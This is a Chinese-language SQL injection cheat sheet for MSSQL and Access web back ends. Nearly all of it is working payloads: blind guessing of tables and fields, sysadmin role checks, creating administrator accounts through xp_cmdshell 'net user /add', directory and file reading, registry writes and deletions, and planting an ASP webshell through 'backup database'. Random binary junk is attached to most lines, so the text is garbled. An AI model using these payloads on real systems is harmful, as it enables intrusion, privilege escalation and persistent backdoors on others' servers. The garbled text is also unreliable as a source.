1.判断是否有注入;and 1=1 ;and 1=2 j9�O"!9$vQ
2.初步判断是否是mssql ;and user>0 +7$zL;ph=n
�Ji;R{tZ.R
3.注入参数是字符'and [查询条件] and ''=' ��8+8P�{�_
P3+?gW��'�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Qe4"a*�l-r
"a]Ff&�T-�
5.判断数据库系统 f1RX`�rXf�
�4L/8Hj#g�
;and (select count(*) from sysobjects)>0 mssql �(E����<QA
/�u pDbP.O
;and (select count(*) from msysobjects)>0 access 3sz?4�9�tX
� &�D���X�
i4\m/&of3y
}x+s5a;!3/
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ���"dFuQ�B
]7
�2w�v#-
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �a{!�
�8T
0Rki�D�8U5
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 f4�l�C*nCN
(db4.G+��0
9.(1)猜字段的ascii值(access) DtOL=m�]�s
d�H�+o��V`
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 >@i��{8AD
9p%�8V�DF=
(2)猜字段的ascii值(mssql) P�s�k�g68W
+^V�%D!.$@
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 nI<�Ab�_EB
{�GK�q�Ou�
10.测试权限结构(mssql) rEY5,'?YHv
�l�POcX'3\
2R`/Oox� �
ALl0(<u67�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �Z >F5rkJ
Fy-|E>@]D�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- .�J.|
�S4D
Qhsk09K_=4
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 6�^v��HFJ$
U=>4�=gs�G
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Z*��M-PaU}
#�NR���9\�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- u�{(-`Al}L
"b�k'�#?9�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- VQ'D�Nv| 9
QP1�bm]QYA
;and 1=(select IS_MEMBER('db_owner'));-- TI^M9;�b��
1xt N�3{c
�ZY{zFg��9
r�^$WX@ t&
11.添加mssql和系统的帐户 �$Z�foJR]%
:Tn1�]a)f6
;exec master.dbo.sp_addlogin username;-- c(!8L\69V}
;exec master.dbo.sp_password null,username,password;-- 7� J+�cs^2
2` j�#e�B1
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ,�]8�$�QFf
h0n,WU/K�w
;exec master.dbo.xp_cmdshell 'net user username password )Qix�de>]p
X�)�k�+�BJ
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- z�x��=AT��
drEND`,@6|
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �Y���n�1CU
�t9+M�E|��
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �V���.1�2�
_)F0o��C {
�d�}_%�xkC
n�k-V{��']
12.(1)遍历目录 [I4&E ���>
c�&u~M�=EW
;create table dirs(paths varchar(100), id int) =�VM4Q+�'K
pi?[j�U[Tn
;insert dirs exec master.dbo.xp_dirtree 'c:\' ,?��c�i+M)
E1V;�eoK.D
;and (select top 1 paths from dirs)>0 (�#%R'9R�v
`o,D�[Jd��
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) LSN�%k5G7.
S�n��~|<Vf
PXJ�`<�XM
7(<�z=��F�
(2)遍历目录 _
ZC[h~�9H
d� vTsbs/6
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��P1�Chm�g
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 xXm�:S�{I�
Ss
c3�uo�0
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 [t}$W*�hY
a<ztA:xt|1
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ]�eD5I�t\�
O]N
�8Q�H
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 EC�F \�/12
Vs~!�\<?�
}ik�J���a�
SB\T
�i�H/
13.mssql中的存储过程 SFR�QpQ�06
p��u9ub.�
xp_regenumvalues 注册表根键, 子键 �o,;Hb4E�u
y&8kOR�z;?
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 g�BCO>nJws
~�76�qFZe-
xp_regread 根键,子键,键值名 �*�g;4?_f
-)2sR>`A�%
;exec xp_regread :KL5A1{���
=z�X�ii{t
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 qH�-'�:|h7
/�vG)n�9Rc
xp_regwrite 根键,子键, 值名, 值类型, 值 ^J_rb�;m43
�so��i.`xE
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��r�7=r~3)
j/R�m~!q�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Z���QQ��0}
:w5p#+/,�P
xp_regdeletevalue 根键,子键,值名 e-.�s�63hm
r:*0�)UZlD
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 }x�E}I�<�M
�=9@t�6� �
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 7)�y9%��-}
(hv>v�f�Y@
5�gn�mR��d
>84:1��`��
14.mssql的backup创建webshell P-c<[DSM'I
g�0
NS�y3t
use model [�#hoW"'Q9
�_B�h�m\|t
create table cmd(str image); q�e\JO'g#e
m:A1wL4c6
insert into cmd(str) values (''); GI�40�Ztms
9V�5�d=�^�
backup database model to disk='c:\l.asp'; K)�d]�3V�!
U`��h�>�[9
�b08s610fk
2|��C(|fD4
15.mssql内置函数 "/MA.zEl0,
j/�<z[�q�r
;and (select @@version)>0 获得Windows的版本号 PWw2;3`-6w
��a6&+�>\o
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �E0Neo _7
O�3�>m,�v�
;and (select user_name())>0 爆当前系统的连接用户 W�F��B�VAD
"X7;�^y��Y
;and (select db_name())>0 得到当前连接的数据库 Q
lg~S1D_v
C�0b���OPn
%��m�5&U6
�ca{u�"�n
16.简洁的webshell '�e�RJQ*0F
3.^�T�m+ C
use model '�3�M�Cb�
+~~&F�O��2
create table cmd(str image); �m2o)/��:�
�]J�%p&y+6
insert into cmd(str) values (''); @&�G< Np�`
6YCF�SvA#/
backup database model to disk='g:\wwwtest\l.asp';
